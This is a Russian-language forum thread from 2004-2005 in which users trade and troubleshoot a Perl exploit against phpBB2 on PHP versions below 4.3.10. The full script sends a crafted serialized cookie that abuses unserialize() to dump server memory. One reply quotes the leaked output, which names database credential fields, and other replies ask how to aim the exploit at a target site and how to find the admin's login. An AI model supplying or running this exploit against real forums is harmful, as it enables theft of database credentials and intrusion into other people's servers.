Цитата |
---|
Гость пишет: Как запустить exe в Xp вылетает окошко и все................ |
20.12.2004 12:39:29
|
|||
|
|
20.12.2004 14:27:07
coded by overdose / bad boyz coding
requete effectuer ... Это что значит? |
|
|
|
20.12.2004 15:13:19
[IMG]
|
|
|
|
20.12.2004 15:53:13
[IMG]
Блин...странно... У меня все работает... Выводит: и т.д. coded by overdose / bad boyz coding requete effectuer ... - string detected : :"test1"; - string detected : LF.( - string detected : &;M - string detected : board_config - string detected : LF.( - string detected : userdata - string detected : LF.( - string detected : theme - string detected : LF.( - string detected : images - string detected : LF.( - string detected : lang - string detected : dbms - string detected : dbhost - string detected : dbname - string detected : dbuser - string detected : dbpasswd - string detected : table_prefix - string detected : PHPBB_INSTALLED - string detected : LF.( - string detected : DEBUG - string detected : tdocs/includes - string detected : lt_lang - string detected : russian - string detected : 42885 короче кучу всякого мусора... Как среди этого г... отрыть что-нить полезное,нет никаких команд полезных,что б выводил и искал сразу то что нужно! |
|
|
|
20.12.2004 15:58:33
Вот сплоит на perl
#!/usr/bin/perl # # Simple phpbb2 + php version < 4.3.10 unserialize() memory dump sql sploit # Based on # cyberlords.met # Usage: perl spl.pl host phpbb_dir # Example: ./spl.pl forum.ru /phpbb/ # Example#2: /spl.pl forum.ru /phpbb/ | strings | awk -F"\n" 'BEGIN{s=0}{s=s+1;printf "string %i: %s\n",s,$1}' # # use Socket; use IO::Handle; my $host=@ARGV[0]; my $dir=@ARGV[1]; socket(SOCK,AF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "socket() failed: $!\n"; connect(SOCK,sockaddr_in(80,inet_aton($host))); SOCK->autoflush(1); my $q=qq{GET $dir HTTP/1.1 HOST: $host Cookie: phpbb2mysql_data=s:400000:%22test1%22%3b; expires=Fri, 24-Dec-2005 21:25:37 GMT; Cookie: phpbb2mysql_sid=1cfd759c33ba3a45b994c7b7cfd948ec; path=/; Accept-Language: ru User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Connection: close }; print SOCK $q; my $all_data,$data,$s; while(sysread(SOCK,$data,1024)){ $all_data.=$data; } while($all_data=~/\%([A-Z0-9]{2})/) { $s=pack('H8', $1); $all_data=~s/\%$1/$s/g; } print $all_data; close SOCK; |
|
|
|
21.12.2004 09:38:28
После того как залил сплёит на свой сайт, как им пользоваться? Пишу:
/phpbb.pl foum.site.ru Или как надо? |
|
|
|
12.03.2005 23:16:14
Что-то не разберу чё за параметр: nboctettoreadinheap ?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
|
|
|
01.05.2005 18:49:35
Шанкер логин админа форума обычно смотрится в самом форуме (когда он пишет сообщения)
|
|
|
|
15.05.2005 02:49:40
а что сам исходник то убрали, у кого есть кинте плиззз ссылочку , я заберу ЭЖ))) плиззз
|
|
|
|
29.05.2005 10:52:16
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
||||
|
|
|||